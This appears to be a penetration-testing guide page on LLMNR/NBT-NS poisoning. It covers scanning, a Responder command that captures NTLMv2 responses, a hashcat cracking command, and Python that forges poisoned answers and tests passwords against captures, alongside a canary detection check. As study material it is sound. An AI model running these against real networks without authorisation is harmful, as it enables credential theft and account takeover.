# Port 5355 - LLMNR

Link-Local Multicast Name Resolution (LLMNR) and its predecessor, NetBIOS Name Service (NBT-NS), are Microsoft Windows components that serve as fallback methods of host name resolution when DNS cannot answer. LLMNR is based on the DNS packet format and lets hosts on the same local link resolve each other's names by multicast (224.0.0.252, UDP 5355); NBT-NS does the same by broadcast on UDP 137. Neither protocol authenticates the answer, so any host on the link can reply.

| Port | Service |
| :--: | ------- |
| 5355 | LLMNR   |
|  137 | NBT-NS  |

Abusing LLMNR via an [AiTM/MITM](https://darkcybe.gitbook.io/darkcybe/offensive-security-operations/penetration-testing/techniques/capec/94-adversary-in-the-middle-aitm) attack can yield credentials in the form of a username and an NTLMv2 challenge-response (loosely called the "NTLMv2 hash"), but it requires a foothold on the same subnet as the victim, because LLMNR multicast and NBT-NS broadcast traffic does not cross routers. The numbered steps and the diagram below show how the attack works:

1. A domain-joined host tries to open `\\servername` and sends a DNS query for the name to its configured DNS server, in this case the Domain Controller (DC), which is also running DHCP.
2. No record for `servername` exists, so the DNS server returns a name error (NXDOMAIN).
3. The host falls back to LLMNR and multicasts the query to every device on the local link (and, where NetBIOS over TCP/IP is enabled, broadcasts an NBT-NS query as well).
4. The attacker answers the query, claiming to be `servername`.
5. The host connects to the attacker (typically over SMB) and authenticates with NTLM, sending its username in plaintext and an NTLMv2 challenge-response derived from its password hash. This response is not the NT hash itself, so it cannot be passed, but it can be cracked.
6. The attacker cracks the captured response offline to recover the plaintext domain password.

<figure><img src="https://1729410104-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUWgoU3Cxbipx0MCPbAcJ%2Fuploads%2FAoHHE4namX4PXZ5UvR08%2FLLMNR.png?alt=media&#x26;token=27146d40-e470-4ceb-a5c3-d6455f323e0c" alt="LLMNR Man-in-the-Middle"><figcaption></figcaption></figure>
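The exchange in steps 3 and 4, as an added example that is not part of the original page: the LLMNR query a host multicasts and the poisoned answer an attacker returns, built and parsed by hand from the RFC 4795 wire format (a DNS-style header, question and A record). The host name, the transaction ID and the attacker address 172.16.2.200 are assumed values; the canary check at the end is the defender-side view of the same packets, since a name that exists nowhere should never receive an answer.

```python
"""Constructed LLMNR exchange (RFC 4795 wire format): the multicast query a host sends
after DNS fails, and the unicast answer a poisoner returns. Example code, not from the page."""
import socket
import struct

LLMNR_GROUP = "224.0.0.252"   # IPv4 multicast group LLMNR queries are sent to
LLMNR_PORT = 5355             # UDP; answers go unicast back to the querier's source port
QTYPE_A, QCLASS_IN = 1, 1
FLAG_QR = 0x8000              # bit 15 of the flags word: 0 = query, 1 = response


def _encode_name(name: str) -> bytes:
    """DNS-style labels: one length byte per label, terminated by a zero byte."""
    return b"".join(bytes([len(label)]) + label.encode("ascii")
                    for label in name.split(".")) + b"\x00"


def _decode_name(buf: bytes, off: int):
    labels = []
    while True:
        n = buf[off]
        off += 1
        if n == 0:
            return ".".join(labels), off
        labels.append(buf[off:off + n].decode("ascii"))
        off += n


def build_query(name: str, txid: int = 0x1234) -> bytes:
    """Step 3: the query a host multicasts to 224.0.0.252:5355 after DNS returned NXDOMAIN."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)          # QDCOUNT=1, no answers
    return header + _encode_name(name) + struct.pack("!HH", QTYPE_A, QCLASS_IN)


def build_poisoned_answer(query: bytes, attacker_ip: str, ttl: int = 30) -> bytes:
    """Step 4: answer whatever name was asked for with the attacker's address, as a poisoner does."""
    q = parse(query)
    header = struct.pack("!HHHHHH", q["id"], FLAG_QR, 1, 1, 0, 0)  # same ID, QR=1, one answer
    question = _encode_name(q["name"]) + struct.pack("!HH", QTYPE_A, QCLASS_IN)
    answer = (_encode_name(q["name"])
              + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, ttl, 4)   # type A, class IN, TTL, RDLENGTH
              + socket.inet_aton(attacker_ip))
    return header + question + answer


def parse(pkt: bytes) -> dict:
    """Decode header, question and any A-record answers from an LLMNR packet."""
    txid, flags, _, ancount, _, _ = struct.unpack("!HHHHHH", pkt[:12])
    name, off = _decode_name(pkt, 12)
    qtype, _ = struct.unpack("!HH", pkt[off:off + 4])
    off += 4
    out = {"id": txid, "response": bool(flags & FLAG_QR), "name": name,
           "qtype": qtype, "answers": []}
    for _ in range(ancount):
        rname, off = _decode_name(pkt, off)
        rtype, _, ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
        off += 10
        rdata = pkt[off:off + rdlen]
        off += rdlen
        if rtype == QTYPE_A and rdlen == 4:
            out["answers"].append((rname, socket.inet_ntoa(rdata), ttl))
    return out


def detect_poisoning(query: bytes, answer: bytes, canary_names) -> str:
    """Defender-side check: a canary name that exists nowhere must never get an answer.
    Returns an alert string, or '' when the answer is not for a canary."""
    q, a = parse(query), parse(answer)
    if a["response"] and a["id"] == q["id"] and a["name"].lower() in canary_names and a["answers"]:
        return f"LLMNR poisoning: '{a['name']}' answered by {a['answers'][0][1]}"
    return ""


if __name__ == "__main__":
    # Constructed exchange: the victim asks for a mistyped host, the attacker (172.16.2.200, assumed) answers.
    query = build_query("servername")
    answer = build_poisoned_answer(query, "172.16.2.200")
    print(parse(query))
    print(parse(answer))
    print(detect_poisoning(query, answer, {"servername"}))
```

Sending the query for real is `sock.sendto(build_query(name), (LLMNR_GROUP, LLMNR_PORT))` on a UDP socket; the poisoner replies unicast to the querier's source address and port, which is why the whole exchange stays on the local link and why the attacker must be on it.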

## Reconnaissance/Discovery

As mentioned in the overview, the attacking machine must sit on the same link (subnet/broadcast domain) as the victim, since LLMNR is multicast and NBT-NS is broadcast and neither crosses routers; domain membership is not required. External reconnaissance will not yield any useful results for this attack. Internally, a UDP scan of a candidate host (a workstation, or the DC) can show whether it listens on 5355 and 137, although UDP scans frequently report `open|filtered`; nmap's `llmnr-resolve` broadcast script (`--script llmnr-resolve --script-args llmnr-resolve.hostname=<name>`) is an alternative. The most reliable check is to listen passively for LLMNR/NBT-NS queries on the link, for example with Responder's analyze mode (`-A`), which logs requests without answering them: the attack only works when hosts actually fail DNS lookups and fall back, so seeing that traffic is what matters.

{% code overflow="wrap" %}

```bash
# LLMNR and NBT-NS are UDP services, so scan with -sU; expect open|filtered on hosts that do not answer probes
sudo nmap -sU -sV -sC -p 137,5355 10.10.10.10
```

{% endcode %}

## Exploitation

### Using [Responder](https://darkcybe.github.io/posts/Responder/) to Perform LLMNR Poisoning

{% code overflow="wrap" %}

```bash
# Responder listener on the attacker machine; ens33 must be on the victims' subnet (broadcast/multicast domain)
# -w starts the rogue WPAD proxy; -d answers DHCP broadcasts in current releases (older builds used -d for NBT-NS domain suffix queries, check --help)
# Needs root to bind the ports it spoofs; it then waits for a host to make a request and also writes captures to logs/SMB-NTLMv2-SSP-<client-ip>.txt
sudo python3 Responder.py -I ens33 -wd
```

{% endcode %}

Once a victim makes a request, Responder prints the client's username and NTLMv2 challenge-response, as in the output below, where the victim client `172.16.2.31` asked for `SERVERNAM` and its Administrator account then authenticated to the attacker, exposing that account's NTLMv2 response.

<figure><img src="https://1729410104-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUWgoU3Cxbipx0MCPbAcJ%2Fuploads%2Fr7aP1atoDdMca9tjXpxf%2FLLMNR_Responder.png?alt=media&#x26;token=8fbb066c-31e6-412b-8058-f7c88235f802" alt="LLMNR - Responder.py"><figcaption></figcaption></figure>

Responder also writes each captured NetNTLMv2 response to a text file under its `logs/` directory, one line per capture in the `USER::DOMAIN:serverchallenge:NTProofStr:blob` format. Collect those lines into a single file and feed it to a credential cracking utility such as hashcat, which handles NetNTLMv2 as mode 5600.

{% code overflow="wrap" %}

```bash
# -m 5600 = NetNTLMv2, -a 0 = straight wordlist attack; run again with --show to print cracked pairs from the potfile
hashcat -m 5600 -a 0 /PATH/TO/DUMP.txt /usr/share/wordlists/rockyou.txt
```

{% endcode %}

<figure><img src="https://1729410104-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUWgoU3Cxbipx0MCPbAcJ%2Fuploads%2FWLeBIpWs2P6Nzicpt0Ns%2FLLMNR_Hashcat.png?alt=media&#x26;token=188f88b5-a634-4234-a4cb-d02d1f1f759b" alt="LLMNR - Hashcat Password Cracking"><figcaption></figcaption></figure>
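What the cracking step actually does, as an added example that is not the page's, Responder's or hashcat's code: the line Responder logs (`USER::DOMAIN:serverchallenge:NTProofStr:blob`, hashcat's mode 5600 input) is checked against a candidate password by recomputing the NTLMv2 response as MS-NLMP defines it: NT hash = MD4(UTF-16LE(password)), NTOWFv2 = HMAC-MD5(NT hash, UTF-16LE(UPPER(user) + domain)), NTProofStr = HMAC-MD5(NTOWFv2, server challenge + blob). The sample capture line, its challenge, blob and password are constructed here from a known password; a real line comes from Responder's logs. MD4 is implemented inline because OpenSSL 3 builds of Python often ship without it.

```python
"""Check a candidate password against a captured NetNTLMv2 response (the hashcat -m 5600
line format Responder logs). Example code, not from the page, Responder or hashcat."""
import hashlib
import hmac
import struct

MASK32 = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); OpenSSL 3 builds of Python often lack hashlib md4."""
    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z
    def rotl(x, n): return ((x << n) | (x >> (32 - n))) & MASK32

    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)            # bit length, little-endian
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        A, B, C, D = a, b, c, d
        for i in range(16):                                   # round 1
            A, B, C, D = D, rotl((A + f(B, C, D) + x[i]) & MASK32, (3, 7, 11, 19)[i % 4]), B, C
        for i in range(16):                                   # round 2
            k = (i % 4) * 4 + i // 4
            A, B, C, D = D, rotl((A + g(B, C, D) + x[k] + 0x5A827999) & MASK32, (3, 5, 9, 13)[i % 4]), B, C
        for i in range(16):                                   # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            A, B, C, D = D, rotl((A + h(B, C, D) + x[k] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[i % 4]), B, C
        a, b, c, d = (a + A) & MASK32, (b + B) & MASK32, (c + C) & MASK32, (d + D) & MASK32
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NT hash: MD4 of the UTF-16LE password. Pass-the-hash needs this value; it never goes on the wire."""
    return md4(password.encode("utf-16le"))


def ntlmv2_hash(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2 (MS-NLMP): HMAC-MD5 keyed with the NT hash over UPPER(user) + domain, UTF-16LE."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def nt_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr: HMAC-MD5 keyed with NTOWFv2 over server challenge + client blob.
    This 16-byte value is what Responder captures and what hashcat mode 5600 guesses against."""
    return hmac.new(ntlmv2_hash(password, user, domain), server_challenge + blob, hashlib.md5).digest()


def parse_5600(line: str):
    """USER::DOMAIN:SERVERCHALLENGE:NTPROOFSTR:BLOB, the last three fields hex-encoded."""
    user, _, domain, challenge, proof, blob = line.strip().split(":", 5)
    return user, domain, bytes.fromhex(challenge), bytes.fromhex(proof), bytes.fromhex(blob)


def check_candidate(line: str, password: str) -> bool:
    """One cracking 'guess': recompute NTProofStr from the candidate and compare."""
    user, domain, challenge, proof, blob = parse_5600(line)
    return hmac.compare_digest(nt_proof(password, user, domain, challenge, blob), proof)


def make_sample_line(user: str, domain: str, password: str, server_challenge: bytes, blob: bytes) -> str:
    """Build a capture line from a known password (demo only; a real line comes from Responder's logs)."""
    proof = nt_proof(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


# Constructed sample: an 8-byte server challenge and a minimal NTLMv2 client blob
# (0x0101 signature, reserved, zero timestamp, 8-byte client nonce, reserved, empty AV pairs, trailer).
SAMPLE_CHALLENGE = bytes.fromhex("0123456789abcdef")
SAMPLE_BLOB = (bytes.fromhex("0101000000000000") + struct.pack("<Q", 0) + bytes.fromhex("aa" * 8)
               + bytes.fromhex("00000000") + bytes.fromhex("00000000") + bytes.fromhex("00000000"))
SAMPLE_LINE = make_sample_line("Administrator", "CORP", "Winter2024!", SAMPLE_CHALLENGE, SAMPLE_BLOB)

if __name__ == "__main__":
    print(SAMPLE_LINE)
    for guess in ("password", "Winter2024!", "winter2024!"):
        print(f"{guess!r}: {check_candidate(SAMPLE_LINE, guess)}")
```

Because only NTProofStr (and the public challenge and blob) travels on the wire, the capture is useful only for offline guessing like this, not for pass-the-hash; every wordlist candidate costs one MD4 and two HMAC-MD5 computations, which is why hashcat gets through large wordlists and rule sets quickly.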

